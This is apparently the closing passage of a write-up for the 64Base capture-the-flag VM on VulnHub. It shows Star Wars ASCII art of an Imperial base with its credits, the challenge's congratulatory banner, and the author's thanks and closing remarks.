       //:o-----------o:\\        ceiling racks.  Bases are usually equipped
      /// X  X X X X  X \\\       with  30 TIE fighters and five TIE bombers
     /// X X  X_X_X  X X \\\      (a single  bomber  takes  up the same rack
  __/// X X   [___]   X X \\\__   space as two fighters).  Five  to 15 ships
 /\_/o X X  1 &/3\&    X X o\_/\  are on constant  patrol,  depending on the
 \]_\\ X X   <\\_//>       //_[/  base's readiness level.
    \\\ X X   \>&</2  X []///
     \\\ X X   []    X []///      1 .............. TIE Fighter Ceiling Racks
      \\\ X   [] []     ///                           (holds up to 40 craft)
       \\:o-----------o://        2 ............. Lift Platforms, to Level 8
       /_/`==========='\_\        3 .................. Flight Control Center
       \_]/           \[_/        X ............................ TIE Fighter
                                  [] ............................ TIE Bomber

____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                                           I n t e r i o r ,   L e v e l   8
                                           ---------------------------------
                                                      (not shown)

  The Flight Deck contains the  tractor beam  generators which catapult out-
  going craft into the open sky and reel in landing ships. Pilots relinquish
  control of  their ships during take off and landing because of the limited
  maneuvering area within the chutes.

____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                               S u b - L e v e l   I n s t a l l a t i o n s
                               ---------------------------------------------
                                                (not shown)

  A large underground section of the base  houses the main power and back-up
  generators, the tractor beam and deflector shield generators, the environ-
  ment  control  station,  and  the  waste  disposal and refuse units.  Some
  storage facilities are also located here.

____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Version 1.9 (released 941211).
 Pictures by Lennert Stock  (LS),  Rowan Crawford (-Row),  Ray Brunner,  Bob
 VanderClay and Joe Rumsey.  The pictures work best when shown on a white on
 black screen  (except for some faces)  with a not too fancy font. Contribu-
 tions welcome, email to the adress below. Sources LS: The Star Wars Source-
 book,  Star Wars Imperial Sourcebook,  The Star Wars Rebel Alliance Source-
 book, Star Wars: The Roleplaying Game (2nd Ed) all by West End Games, Inc.

____________________________________________________________________________

  ______  ______  ______  ______  ______  ______  ______  ______  
 |______||______||______||______||______||______||______||______||______| 
  _   _   ____ __          __ __     __ ____   _    _  _  _____   ______  
 | \ | | / __ \\ \        / / \ \   / // __ \ | |  | |( )|  __ \ |  ____| 
 |  \| || |  | |\ \  /\  / /   \ \_/ /| |  | || |  | ||/ | |__) || |__    
 | . ` || |  | | \ \/  \/ /     \   / | |  | || |  | |   |  _  / |  __|   
 | |\  || |__| |  \  /\  /       | |  | |__| || |__| |   | | \ \ | |____  
 |_| \_| \____/    \/  \/        |_|   \____/  \____/    |_|  \_\|______| 
                                _  ______  _____  _____  _                
             /\                | ||  ____||  __ \|_   _|| |               
            /  \               | || |__   | |  | | | |  | |               
           / /\ \          _   | ||  __|  | |  | | | |  | |               
          / ____ \        | |__| || |____ | |__| |_| |_ |_|               
         /_/    \_\        \____/ |______||_____/|_____|(_)               
  ______  ______  ______  ______  ______  ______  ______  ______  ______  
 |______||______||______||______||______||______||______||______||______| 
                                                                          

                    I hope you enjoyed this challenge
                    Please leave comments & feedback
                    @ https://www.vulnhub.com/?q=64base
                    -----------------------------------
                    64Base Challenge by 3mrgnc3
                    @ https://3mrgnc3.ninja   
                    -----------------------------------


Holy cow! This was an awesome VM to work with. There were a ton of tools and tricks that I either haven't used in forever, or was able to learn. I really loved the Star Wars theme and the ASCII art. This VM had plenty of rabbit holes to get lost in but had the perfect amount of *hints* to help keep you on track.

I'd like to thank @3mrgnc3 for creating such a fun VM and of course g0tmi1k and vulnhub for hosting these wonderful images. Also, I'd like to thank some of my buddies that worked on this with me.

Until next time!

geoda